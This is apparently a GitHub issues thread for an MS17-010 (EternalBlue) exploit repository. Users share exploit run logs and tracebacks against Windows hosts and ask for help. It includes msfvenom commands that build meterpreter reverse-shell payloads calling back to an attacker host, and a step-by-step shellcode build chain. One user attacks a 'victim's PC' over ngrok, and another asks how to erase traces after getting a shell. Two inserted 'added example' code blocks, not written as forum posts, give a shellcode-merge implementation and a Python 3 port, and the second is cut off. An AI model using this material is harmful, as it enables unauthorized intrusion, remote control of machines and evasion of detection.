worawit / MS17-010
MS17-010
How do I send a payload with this? It just creates pwned.txt on the target system.
Thanks...
Thanks for your great code!
I found a connected IPC$, but I don't know the password.
Could I use this IPC$ to attack it, and how?
Replace
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
with
conn.getconnectionsfromlist(connected list)
In eternalblue_exploit7.py there is <shellcode_file> [numGroomConn]. What is shellcode_file? Can you give an example? Thanks!
I get an error for each IP I exploit. Why this error?
Code:
for ip in $(cat ips);
do
python MS17-010/eternalblue_exploit7.py $ip MS17-010/shellcode/sc_all.bin
python MS17-010/eternalblue_exploit8.py $ip MS17-010/shellcode/sc_all.bin
done
Error:
shellcode size: 1739
numGroomConn: 4
Traceback (most recent call last):
File "MS17-010/eternalblue_exploit7.py", line 563, in <module>
exploit(TARGET, sc, numGroomConn)
File "MS17-010/eternalblue_exploit7.py", line 473, in exploit
conn = smb.SMB(target, target)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2402, in __init__
self.neg_session()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2605, in neg_session
smb = self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
and
socket.error: [Errno 104] Connection reset by peer
...
I was wondering if you had come across this before. I can't get a reverse shell and it reboots the Windows 7 PC; any help would be much appreciated:
shellcode size: 962
numGroomConn: 3
Target OS: Windows 7 Professional N 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 563, in <module>
exploit(TARGET, sc, numGroomConn)
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 545, in exploit
conn.logoff()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3757, in logoff
self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 920, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
python checker.py 10.10.10.178
Traceback (most recent call last):
File "checker.py", line 40, in <module>
conn = MYSMB(target)
File "/home/warmachine/Documentos/HTB/Nest/MS17-010/mysmb.py", line 118, in __init__
smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2427, in __init__
self.neg_session()
File "/home/warmachine/Documentos/HTB/Nest/MS17-010/mysmb.py", line 147, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2642, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2506, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 996, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
I created a folder named mysmb in dist-packages and downloaded mysmb.py into it, but when I run zzz_exploit.py it says ImportError: No module named mysmb.
Do you have a tutorial on how to install the extended Impacket SMB?
I hope you reply.
Thank you
Does it require another Python version?
Look at this:
root@kali:/Tools/exploits/windows/MS17-010-master# python mysmb.py
root@kali:/Tools/exploits/windows/MS17-010-master# python zzz_exploit.py 10.2.0.103 spollss
Traceback (most recent call last):
File "zzz_exploit.py", line 1057, in <module>
exploit(target, pipe_name)
File "zzz_exploit.py", line 790, in exploit
conn = MYSMB(target)
File "/root/Tools/exploits/windows/MS17-010-master/mysmb.py", line 118, in __init__
smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2412, in __init__
self._sess = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 833, in __init__
timeout=timeout, local_type=local_type, sock=sock)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 705, in __init__
self._sock = self._setup_connection((remote_host, sess_port), timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 844, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
socket.error: [Errno Connection error (10.2.0.103:445)] timed out
Unable to execute the script. See the errors below:
┌──(kali㉿kali)-[~/MS17-010]
└─$ python3 send_and_execute.py
send_and_execute.py <executable_file> [port] [pipe_name]
┌──(kali㉿kali)-[~/MS17-010]
└─$ python3 send_and_execute.py ms17-010.exe
Trying to connect to :445
Target OS: Windows 5.1
Using named pipe: netlogon
Groom packets
Traceback (most recent call last):
File "/home/kali/MS17-010/send_and_execute.py", line 1077, in <module>
exploit(target, port, pipe_name)
File "/home/kali/MS17-010/send_and_execute.py", line 839, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/kali/MS17-010/send_and_execute.py", line 615, in exploit_fish_barrel
conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)
File "/home/kali/MS17-010/mysmb.py", line 262, in send_trans
self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
File "/home/kali/MS17-010/mysmb.py", line 258, in create_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/kali/MS17-010/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
Hi all, I am quite new to this, bear with me. Not sure if this is a bug or not but I would like to share so that in the event that it is a bug, it will be known.
Note "mysmb.py" is in the same directory as "eternalblue_exploit7.py".
If I attempt to run the exploit using Python: python eternalblue_exploit7.py 192.168.114.45 /Exploits/AutoBlue-MS17-010-master/shellcode/sc_all.bin
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 2, in <module>
from impacket import smb
ImportError: No module named impacket
So I attempted to install the module, however:
root@kali:/Exploits/AutoBlue-MS17-010-master# apt install python-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package python-impacket is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python3-impacket impacket-scripts
E: Package 'python-impacket' has no installation candidate
I noticed that python3-impacket is already installed on the system:
root@kali:/Exploits/AutoBlue-MS17-010-master# apt install python3-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3-impacket is already the newest version (0.9.21-2).
The following packages were automatically installed and are no longer required:
libcdio18 libcfitsio8 libgtksourceview2.0-0 libgtksourceview2.0-common libjsoncpp1 libmpdec2
libobjc-9-dev libpoppler82 libprotobuf22 libtsk13 libx264-155 libx264-159 openjdk-8-jre
python-cairo python-dbus python-enchant python-gi python-gobject-2 python-gtk2
python-gtksourceview2 python-numpy python-pkg-resources python3-flask-restless python3-grequests
python3-mimeparse python3-mimerender
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
So I tried to run the exploit with python3: python3 eternalblue_exploit7.py 192.168.114.45 /Exploits/AutoBlue-MS17-010-master/shellcode/sc_all.bin
However the following occurred:
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 76, in <module>
ntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde
TypeError: can't concat str to bytes
Any insight is appreciated.
MS17-010 covers six distinct issues. Could you please clarify which issue(s) this exploits?
Thanks for this PoC!
I'm trying to build a fully working .exe for easy deployment (obviously, I can't install Python and tons of dependencies everywhere).
Tried pyinstaller with Python 2.7, it builds the binary, but after running it, I get:
File "C:\PyInstaller-3.2.1\PyInstaller\loader\pyimod03_importers.py", line 389, in load_module
exec(bytecode, module.__dict__)
File "socket.py", line 47, in <module>
ImportError: No module named _socket
Failed to execute script zzz_exploit
===
Any suggestions about which of the python->exe compilers might work? I can foresee a lot of trouble fixing all these missing modules, deps, and DLLs... but at least I'd give it a try... :)
My PC is on the internet via a router, and the attacker machine is on a mobile hotspot and port-forwarded with ngrok. When creating meterpreter.bin I used LHOST 0.tcp.ngrok.io and LPORT set to the port given by ngrok (this is how I do it for normal Meterpreter sessions). Now when I scan the public IP of my victim's PC with nmap it shows a Linux OS and says it's a router. In msfconsole I set LHOST to 0.0.0.0 and LPORT to the port forwarded by ngrok.
Now tell me: if I use the public IP that nmap shows as Linux, can I succeed with this exploit on a vulnerable Windows 8.1 machine?
I will upload the nmap report once I get back to the PC.
Hello
When I try to run zzz_exploit.py (which I renamed 42315.py here), I get the following error: can only concatenate str (not "byte")
I am running python3.
Thanks for your help
python3 42315.py 192.168.1.2 netlogon
Target OS: Windows Server 2012 R2 Standard 9600
Traceback (most recent call last):
File "/root/42315.py", line 998, in <module>
exploit(target, pipe_name)
File "/root/42315.py", line 834, in exploit
if not info['method'](conn, pipe_name, info):
File "/root/42315.py", line 489, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/root/42315.py", line 333, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/root/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/root/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
.......
Traceback (most recent call last):
File "/home/user/ms/zzz_exploit.py", line 1002, in <module>
exploit(target, pipe_name)
File "/home/user/ms/zzz_exploit.py", line 895, in exploit
service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
File "/home/user/ms/zzz_exploit.py", line 948, in service_exec
rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 964, in bind
self._transport.send(packet.get_packet())
File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 389, in send
self.__smb_connection.transactNamedPipe(self.__tid,self.__handle,data, waitAnswer = False)
File "/usr/lib/python2.7/dist-packages/impacket/smbconnection.py", line 410, in transactNamedPipe
return self._SMBConnection.TransactNamedPipe(treeId, fileId, data, waitAnswer = waitAnswer)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3555, in TransactNamedPipe
self.send_trans(tid,pack('<HH', 0x26, fid),'\PIPE\\x00','',data, noAnswer = noAnswer)
TypeError: send_trans() got an unexpected keyword argument 'noAnswer'
Hi, I have this error 👍
root@kali:~/Documents/exploitation/win/autoBlue/AutoBlue-MS17-010# python eternalblue_checker.py 192.168.255.118
Traceback (most recent call last):
File "eternalblue_checker.py", line 40, in <module>
conn = MYSMB(target)
File "/root/Documents/exploitation/win/autoBlue/AutoBlue-MS17-010/mysmb.py", line 118, in __init__
smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2423, in __init__
self._sess = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 878, in __init__
timeout=timeout, local_type=local_type, sock=sock)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 738, in __init__
self._sock = self._setup_connection((remote_host, sess_port), timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 889, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
socket.error: [Errno Connection error (192.168.255.118:445)] [Errno 111] Connection refused
If you have any idea where the error comes from, you'll save my day :)
File "./checker.py", line 56, in <module>
recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
File "/mnt/hgfs/OSCP/5/MS17-010/mysmb.py", line 262, in send_trans
self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
File "/mnt/hgfs/OSCP/5/MS17-010/mysmb.py", line 259, in create_trans_packet
return self.create_smb_packet(transCmd, mid, pid, tid)
File "/mnt/hgfs/OSCP/5/MS17-010/mysmb.py", line 229, in create_smb_packet
req = str(pkt)
Reproduction steps:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
...
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445
...
./eternalblue_merge_shellcode.py sc_x86_msf.bin sc_x64_msf.bin sc_out.bin
python eternalblue_exploit7.py IP /opt/MS17-010/shellcode/sc_all.bin
shellcode size: 874
numGroomConn: 13
Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 582, in <module>
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 544, in exploit
recvPkt = conn.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
The exploit is working fine, but I don't understand how it works to complete the process and get a meterpreter session.
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x84927da8
SESSION: 0xe2b8b190
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe3693030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe36930d0
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Done
Can someone help me? Thanks.
Hello,
For some time now, I've been running the following command and receiving the error below. I have tried re-installing python-impacket and using mysmb.py, to no avail. Would you have any insight into what the problem is with my setup/command? Running 2018.1 x64.
Command
python eternalblue_exploit7.py 10.10.10.40 reverse_shell.bin 500
Error:
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 564, in <module>
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 508, in exploit
holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
File "eternalblue_exploit7.py", line 270, in createSessionAllocNonPaged
conn = smb.SMB(target, target)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2402, in __init__
self.neg_session()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2606, in neg_session
return parsePacket(smb)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2560, in parsePacket
if smb.isValidAnswer(SMB.SMB_COM_NEGOTIATE):
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 712, in isValidAnswer
raise SessionError, ("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS)
impacket.smb.SessionError: SMB SessionError: class: ERRDOS, code: ERRnomem(Insufficient server memory to perform the requested function.)
Hello,
I'm doing some tests with Windows Server 2012 R2 (fresh install), using these steps:
nasm -f bin eternalblue_kshellcode_x64.asm
nasm -f bin eternalblue_kshellcode_x86.asm
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4444
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o meterpreter_msf_x86.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4445
cat eternalblue_kshellcode_x64 meterpreter_msf.bin > meterpreter_payload.bin
cat eternalblue_kshellcode_x86 meterpreter_msf_x86.bin > meterpreter_msf_x86_payload.bin
python eternalblue_sc_merge.py meterpreter_payload.bin meterpreter_msf_x86_payload.bin sc_all.bin
eternalblue_exploit8.py << set valid credentials
use msfconsole with exploit/multi/handler
python eternalblue_exploit8.py 192.168.105.163 sc_all.bin 12
shellcode size: 2568
numGroomConn: 12
Target OS: Windows Server 2012 R2 Standard 9600
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
done
Windows Server 2012 R2 always crashes and reboots; no session is created.
Am I missing something?
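The build steps above, like the reproduction steps in the earlier Windows Server 2008 R2 report, concatenate a kernel stage with an msfvenom raw payload for each architecture and then merge the x86 and x64 results into one file. The following is an added example and not the repository's eternalblue_sc_merge.py: it shows the standard architecture-detect stub that such a merge prepends (x86 decodes 0x40 as inc eax, x64 decodes it as an empty REX prefix, so the following jz branches only in 64-bit mode) and a checker for the inverse. That the project's own script emits exactly this stub is an assumption; the function names are illustrative.

```python
from struct import pack

# 31 C0        xor eax, eax   -> ZF = 1 in both modes
# 40           x86: inc eax (ZF = 0); x64: empty REX prefix, no effect on jz
# 0F 84 rel32  jz rel32       -> not taken on x86, taken on x64
ARCH_STUB = b"\x31\xc0\x40\x0f\x84"


def build_payload(kernel_shellcode, user_shellcode):
    # kernel stage first, user-mode payload appended, as the cat steps above do
    return bytes(kernel_shellcode) + bytes(user_shellcode)


def merge_arch(sc_x86, sc_x64):
    """One blob that runs sc_x86 on a 32-bit kernel and sc_x64 on a 64-bit one."""
    sc_x86 = bytes(sc_x86)
    sc_x64 = bytes(sc_x64)
    # jz is relative to the end of the 9-byte stub, so a displacement equal to
    # len(sc_x86) lands on the first byte of sc_x64
    return ARCH_STUB + pack("<I", len(sc_x86)) + sc_x86 + sc_x64


def split_merged(blob):
    # inverse of merge_arch: useful for sanity-checking a merged file on disk
    blob = bytes(blob)
    if blob[:5] != ARCH_STUB:
        raise ValueError("no arch-detect stub at offset 0")
    x86_len = int.from_bytes(blob[5:9], "little")
    if 9 + x86_len > len(blob):
        raise ValueError("x86 length field exceeds blob size")
    return blob[9:9 + x86_len], blob[9 + x86_len:]


if __name__ == "__main__":
    import sys
    # usage: merge_arch.py sc_x86.bin sc_x64.bin sc_out.bin  (illustrative name)
    if len(sys.argv) == 4:
        with open(sys.argv[1], "rb") as f86, open(sys.argv[2], "rb") as f64:
            merged = merge_arch(f86.read(), f64.read())
        with open(sys.argv[3], "wb") as out:
            out.write(merged)
        print("wrote %d bytes" % len(merged))
```

Running split_merged over the file that is actually passed to the exploit script is a quick way to confirm that the x86 and x64 halves are non-empty and that the file handed to the exploit is the merged one rather than one of its inputs.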
As the title says.
When I try to run different exploit scripts (this one or sleepya's) against my VBox Win8, I get the following error.
python eternalblue8_exploit.py ... meterpreter.bin 200
shellcode size: 1502
numGroomConn: 1000
Traceback (most recent call last):
File "eternalblue8_exploit.py", line 564, in <module>
exploit(TARGET, sc, numGroomConn)
File "eternalblue8_exploit.py", line 454, in exploit
conn = smb.SMB(target, target)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2402, in __init__
self.neg_session()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2605, in neg_session
smb = self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 920, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
What files and registry entries do we need to delete to make the system clean again after the exploit succeeds and a reverse shell is obtained?
Please!! Anyone?
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.***
RHOSTS => 192.168.1.***
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.***:4444
[-] 192.168.1.***:445 - Host does NOT appear vulnerable.
[*] 192.168.1.***:445 - Connecting to target for exploitation.
[+] 192.168.1.***:445 - Connection established for exploitation.
[+] 192.168.1.***:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.***:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.***:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 72 Windows 7 Profes
[*] 192.168.1.***:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 75 sional 7601 Serv
[*] 192.168.1.***:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 30 ice Pack 1
[+] 192.168.1.***:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.***:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.***:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.***:445 - Starting non-paged pool grooming
[-] 192.168.1.***:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.***:445).
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
I can generate shellcode with C++.
Can I use it instead of the two asm files you provided as the shellcode?
And can I skip merging the shellcodes and use a single shellcode if I know the target's architecture?
I used eternalblue_exploit7.py against my Win7 with the raw shellcode from msfvenom xxx -f raw, but the target bluescreened.
How do I compile and use eternalblue_kshellcode_xxx.asm with eternalblue_exploit7.py?
Please help, expert~
Only eternalblue_exploit7.py and eternalromance_poc.py run successfully.
I'm facing the problem below with the other exploits:
e.g. python eternalblue_poc.py 10.10.96.53
Traceback (most recent call last):
File "eternalblue_poc.py", line 21, in <module>
conn.login(USERNAME, PASSWORD)
File "/home/pallavi/Desktop/MS17-010-master/mysmb.py", line 137, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
This is what I get when testing on my side. Could you take a look and give me some guidance?
Traceback (most recent call last):
File "./zzz_exploit.py", line 996, in <module>
exploit(target, pipe_name)
File "./zzz_exploit.py", line 794, in exploit
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
File "/root/桌面/MS17-010-master/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
[*] 192.168.234.130:445 - Connecting to target for exploitation.
[+] 192.168.234.130:445 - Connection established for exploitation.
[+] 192.168.234.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.234.130:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.234.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.234.130:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.234.130:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.234.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.234.130:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.234.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.234.130:445 - Starting non-paged pool grooming
[+] 192.168.234.130:445 - Sending SMBv2 buffers
[+] 192.168.234.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.234.130:445 - Sending final SMBv2 buffers.
[*] 192.168.234.130:445 - Sending last fragment of exploit packet!
[*] 192.168.234.130:445 - Receiving response from exploit packet
[+] 192.168.234.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.234.130:445 - Sending egg to corrupted connection.
[*] 192.168.234.130:445 - Triggering free of corrupted buffer.
[-] 192.168.234.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.234.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.234.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
Targeting Windows 8.1 x64 using the guest user account:
python2 checker.py 192.168.10.1
Target OS: Windows 8.1 Connected 9600
The target is not patched
=== Testing named pipes ===
spoolss: Ok (64 bit)
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
python2 zzz_exploit.py 192.168.10.1 spoolss
Target OS: Windows 8.1 Connected 9600
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00208c9a098
InParam: 0xffffc00205e7c16c
MID: 0x1706
unexpected alignment, diff: 0x2e1d098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206410048
InParam: 0xffffc0020627116c
MID: 0x1701
unexpected alignment, diff: 0x19e048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc002064a6098
InParam: 0xffffc0020641d16c
MID: 0x1709
unexpected alignment, diff: 0x88098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc0020649b048
InParam: 0xffffc002064eb16c
MID: 0x170a
unexpected alignment, diff: 0x-50fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206643048
InParam: 0xffffc002065ef16c
MID: 0x1802
unexpected alignment, diff: 0x53048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001ff17f048
InParam: 0xffffc0020664916c
MID: 0x1802
unexpected alignment, diff: 0x-74cafb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206630048
InParam: 0xffffc0020679216c
MID: 0x1802
unexpected alignment, diff: 0x-162fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00205f41048
InParam: 0xffffc002067c416c
MID: 0x190a
unexpected alignment, diff: 0x-883fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fc1f5048
InParam: 0xffffc002068d916c
MID: 0x1902
unexpected alignment, diff: 0x-a6e4fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fe187098
InParam: 0xffffc0020691e16c
MID: 0x190a
unexpected alignment, diff: 0x-8797f68
leak failed... try again
Done
Can someone please explain how I can throw this exploit at a vulnerable Windows 2000 server? The zzz_exploit just appears to create a txt file on the remote host, but I need to get a reverse shell.
Hi All,
Not sure if you're interested, but I really like this exploit, so I've simplified the build. It's geared more towards Windows 7 but easily ported to use the other scripts.
My programming level is low, so I cannot upgrade this repository to Python 3. Is there some very good person who can upgrade this repository to Python 3 and the latest impacket version? Thank you in advance.
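Several reports above (send_and_execute.py, eternalblue_exploit7.py at import time, and the renamed zzz_exploit.py) fail under Python 3 with "can only concatenate str (not "bytes") to str" or "can't concat str to bytes". The scripts were written for Python 2, where str is already a byte string; on Python 3 every literal that is joined to struct.pack output or to data read from the socket has to be a bytes literal. The following is an added example, not code from the repository: an illustrative bytes-safe version of the pad-and-concatenate pattern behind these errors, plus the Python 3 form of the NTFEA buffer that fails at import. The function names and the 4-byte alignment rule are assumptions for illustration, not mysmb.py's actual layout logic.

```python
from struct import pack


def as_bytes(value):
    # Python 2 str was a byte string; latin-1 maps code points 0-255 one-to-one
    # onto bytes, so it reproduces those values unchanged on Python 3.
    if isinstance(value, bytes):
        return value
    if isinstance(value, str):
        return value.encode("latin-1")
    raise TypeError("expected str or bytes, got %s" % type(value).__name__)


def pad_to(offset, alignment=4):
    # zero bytes needed to reach the next alignment boundary (0 if aligned)
    return (-offset) % alignment


def put_trans_data(header_len, parameters, data, no_pad=False):
    """Lay out transaction parameters, then data, after a header of
    header_len bytes. Each block is padded to a 4-byte boundary unless
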